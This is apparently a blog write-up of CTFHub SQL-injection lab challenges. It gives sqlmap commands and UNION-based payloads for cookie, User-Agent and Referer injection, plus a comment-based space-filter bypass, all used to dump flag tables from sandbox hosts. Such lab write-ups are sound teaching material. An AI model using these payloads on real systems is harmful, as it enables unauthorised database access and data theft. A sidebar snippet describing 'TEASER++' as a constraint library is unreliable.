CTFHub~SQL注入【MySQL结构+Cookie注入+UA注入+Refer注入+过滤空格】

于 2024-08-19 18:59:51 发布
阅读量381 收藏 2
点赞数 7
分类专栏: CTFHub靶场 文章标签: 网络安全 php apache android sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67832625/article/details/141332588
版权

在这里插入图片描述

0x05时间盲注

我们还是继续来用sqlmap来爆数据库。

# 查询数据库名
python3 sqlmap.py sqlmap -u "http://challenge-5f63f4fbdb956b3d.sandbox.ctfhub.com:10800?id=1" --current-db --batch

image-20240812195459392

# 查看数据库的表名
python3 sqlmap.py sqlmap -u "http://challenge-5f63f4fbdb956b3d.sandbox.ctfhub.com:10800?id=1" -D sqli --tables --batch

image-20240812195711190

# 查看数据库中flag表中的字段
python3 sqlmap.py sqlmap -u "http://challenge-5f63f4fbdb956b3d.sandbox.ctfhub.com:10800?id=1" -D sqli -T flag --columns --batch

image-20240812195957592

# 查看当前数据库中的所有数据
python3 sqlmap.py sqlmap -u "http://challenge-5f63f4fbdb956b3d.sandbox.ctfhub.com:10800?id=1" -D sqli -T flag --dump --batch

image-20240812200413373

0x06MySQL结构

# 查询数据库名
python3 sqlmap.py sqlmap -u "http://challenge-d7a39c904d3e1f88.sandbox.ctfhub.com:10800?id=1" --current-db --batch

image-20240812200756762

# 查询数据库的表名
python3 sqlmap.py sqlmap -u "http://challenge-d7a39c904d3e1f88.sandbox.ctfhub.com:10800?id=1" --batch -D sqli --tables

image-20240812200907179

# 查看news表中的字段
python3 sqlmap.py sqlmap -u "http://challenge-d7a39c904d3e1f88.sandbox.ctfhub.com:10800?id=1" --batch -T gloizcxnee  --columns

image-20240812201126226

# 查看数据库中所有的数据
python3 sqlmap.py sqlmap -u "http://challenge-d7a39c904d3e1f88.sandbox.ctfhub.com:10800?id=1" --batch -T gloizcxnee  --dump

image-20240812201224396

0x07Cookie注入

这道题我们需要通过抓包来对cookie进行操作,来完成任务

# 通过抓包查看回显位置
1 union select 1,2

image-20240812201706823

# 查看数据库名
-1 union select 1,database()

image-20240812201848577

# 查看数据库中的表名
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

image-20240812202021305

# 查询vccdkaqxbl表中的字段
-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='vccdkaqxbl'

image-20240812202223402

# 查询数据库中的数据
-1 union select 1,group_concat(llhlayzpdh) from sqli.vccdkaqxbl

image-20240812202443114

0x08UA注入

# 通过抓包来爆数据库
-1 union select l,group_concat(schema_name) from information_schema.schemata

image-20240812203102491

# 爆数据库中的表名
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema = sqli

image-20240812203157552

# 爆数据库中的字段
-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'bkoqrywcto'

image-20240812203416822

# 爆数据库中所有的数据
-1 union select 1,group_concat(fhlxjtkdeg) from bkoqrywcto

image-20240812203624560

0x09Refer注入

# 这道题我们是用hackbar来做

image-20240812204427924

# 查询数据库
-1 union select 1,database()

image-20240812205323477

# 查询数据库中的表
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

image-20240812205418741

# 查询表中的字段
-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='wdpqevdhte'

image-20240812205525888

# 查询数据库中的所有数据
-1 union select 1,group_concat(ihwswrmydd) from wdpqevdhte

image-20240812205650584

0x0a过滤空格

这道题空格被过滤了,所以我们使用/**/来过滤

# 查询数据库名
-1/**/union/**/select/**/1,database()

image-20240812205908805

# 查询数据库中的表名
-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

image-20240812210352096

# 查询数据库中表的字段
-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='cppznyhepg'

image-20240812210459145

# 查询表中的所有数据
-1/**/union/**/select/**/1,group_concat(xcsvxeovdc)/**/from/**/cppznyhepg

image-20240812210601076
好小子,离成功又近一步!!!

蚂蚱.top
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHUB-web-SQL注入
ookami6497的博客
11-29 793
CTFHUB SQL
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1093
ctfhubSQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
CTFHUB|SQL注入sqlmap)
m0_60651303的博客
07-14 1213
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
CTFHub-Web-SQL注入
IceCream的博客
04-30 1161
1.题目说输入1,先将1输入查看结果2.接着输入4-1,发现输出的结果为4-1,判定存在整数型注入3.查询字段数,出现了回显,判断这里的字段数为24.判断注入点在2的位置,也就是data5.查询数据库名,得知为sqli6.查询该库下的表名,得知为news、flag7.查询flag表下的字段8.发现了flag字段,去查询flag字段的内容,最终得到flag。
CTFHUB-SQL注入
m_de_g的博客
08-11 5744
** CTFHUB-SQL注入 ** 一、SQl注入的基础 1.介绍SQL注入 SQL注入就是指WEB应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来是实现对数据库的任意操作。 一般情况下,开发人员可以使用动态SQL语句创建通用、灵活的应用。动态SQL语句是在执行过程中构造的,他根据不同的条件产生不同的SQL语句。当开发人员在运行过程中需要根据不同的查询标准决定提取什么字段(如select语句),或者根据不同的条件选择不同
CTFHub(SQL注入)
cxiaodi的博客
05-09 1285
CTFHubSQL注入专题)
CTFHub技能树 Web-SQL注入详解
千寻的博客
11-21 2033
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
[CTFHub] Web SQL注入 Write ups
yym68686
02-16 220
整数型注入 查询语句1 union 查询语句2 我们要让查询语句1失效,查询语句2是我们注入的语句,返回正确的结果。如果id=-1,显然数据库查询不到,所以返回NULL,不显示,然后执行查询语句2显示正确的的结果。 查询所有数据库 -1 union select 1, group_concat(schema_name) from information_schema.schemata 查询sqli中所有表名称 -1 union select 1, group_concat(table_name)
CTFHub——SQL注入
Aquarius_ego的博客
05-05 1478
CTFHub——SQL注入(报错注入、布尔盲注、时间盲注、MySQL结构Cookie注入UA注入Refer注入过滤空格
minboundrect.rar_minboundrect_refer2y6_图像最小矩形_最小二乘法+最小边界
07-14
可用于图像图形操作中封闭图形的矩形界定,用于取得最小的矩形图,即长度宽度的数值。
Notepad++ JsonView插件
07-05
1. **高亮显示**:JsonView会为JSON文件提供颜色编码,使得数据结构一目了然,便于快速理解和编辑。 2. **折叠/展开**:可以折叠和展开JSON对象和数组,帮助你更好地管理复杂的JSON结构。 3. **快速导航**:通过树形...
iPod+Authentication+Coprocessor+Spec+2.0C+R1
05-30
to refer generically to iPods, iPhones, and iPads, all of which support the iPod Accessory Protocol (iAP) interface. Among these products, those that also run iOS (Apples mobile operating system)are ...
Notepad++ JSON格式 转换插件
05-14
直接复制到Notepad++ 安装目录下的\plugins文件夹即可 - 使用的时候全选json部分字符 - 在工具栏选择 -插件 --JSONviewer ---Format JSON 即可转换
基于SSM+mysql的企业人事管理系统源码数据库论文.doc
07-02
The use of collaborative analysis algorithms is also mentioned, which could refer to techniques like clustering, recommendation systems, or data mining for analyzing employee profiles, performance, ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8395
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
37_DC-5靶机渗透测试、nmap使用、kail漏洞库使用、系统提权、反弹shell到kali、留后门、蚁剑连接webshell、文件包含漏洞利用、NC用法
最新发布
weixin_54591045的博客
08-15 597
知识点:web的、Linux、系统命令、Python kail漏洞库使用、系统提权、反弹shell到kali、留后门、蚁剑连接webshell、文件包含漏洞利用
思科RIP动态路由配置3
2302_76730689的博客
08-14 679
路由信息协议(Routing Information Protocol,RIP)是应用较早、使用较普遍的动态路由协议,也是内部网关协议,由于RIP以跳数作为衡量路径的开销,且规定最大跳数为15,因此RIP在实际应用中是有一定限制的,通常适用于中小型的企业网络。Router-A(config-router)#network 网段!#9查看Switch-A、Router-A、Router-B的路由表。#3配置Router-A的名称及其接口IP地址。#7在Router-A上配置动态RIP。
多媒体技术及应用课程思政网站
m0_73706453的博客
08-15 621
在Internet高速发展的今天,我们生活的各个领域都涉及到计算机的应用,其中包括多媒体技术及应用课程思政网站的网络应用,在外国多媒体技术及应用课程思政已经是很普遍的方式,不过国内的多媒体技术及应用课程思政可能还处于起步阶段。多媒体技术及应用课程思政网站具有学习音频功能。多媒体技术及应用课程思政网站采用PHP语言,Thinkphp5框架,基于mysql开发,实现了首页、个人中心、学生管理、教师管理、课程分类管理、学习视频管理、学习课程管理、学习音频管理、课程笔记管理、反馈留言、系统管理等内容进行管理,本系
TEASER++ python
07-27
TEASER++ is a Python library for creating and solving constraint satisfaction problems (CSPs). It provides a convenient way to define variables, domains, and constraints, and allows you to find solutions that satisfy all the given constraints. To get started with TEASER++, you can follow these steps: 1. Install TEASER++ by running `pip install teaserpp`. 2. Import the necessary modules in your Python script: ```python from teaserpp import Constraint, Domain, Problem, Variable ``` 3. Create variables using the `Variable` class and specify their domains using the `Domain` class: ```python x = Variable("x", Domain(range(1, 10))) y = Variable("y", Domain(range(1, 10))) ``` 4. Define constraints using the `Constraint` class. You can use various operators like `==`, `!=`, `<`, `>`, `<=`, `>=`, and logical operators like `&` (and), `|` (or), and `~` (not): ```python constraint = Constraint(x != y) ``` 5. Create a problem instance using the `Problem` class and add variables and constraints to it: ```python problem = Problem() problem.add_variable(x) problem.add_variable(y) problem.add_constraint(constraint) ``` 6. Solve the problem using the `solve()` method: ```python solutions = problem.solve() ``` 7. Iterate over the solutions to retrieve the values of variables that satisfy the constraints: ```python for solution in solutions: print(solution[x], solution[y]) ``` This is just a basic overview of TEASER++. You can refer to the official documentation for more details and advanced usage. Please note that the above information is based on my understanding of TEASER++ as of now. If there are any specific details or updates you would like to know, please let me know!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值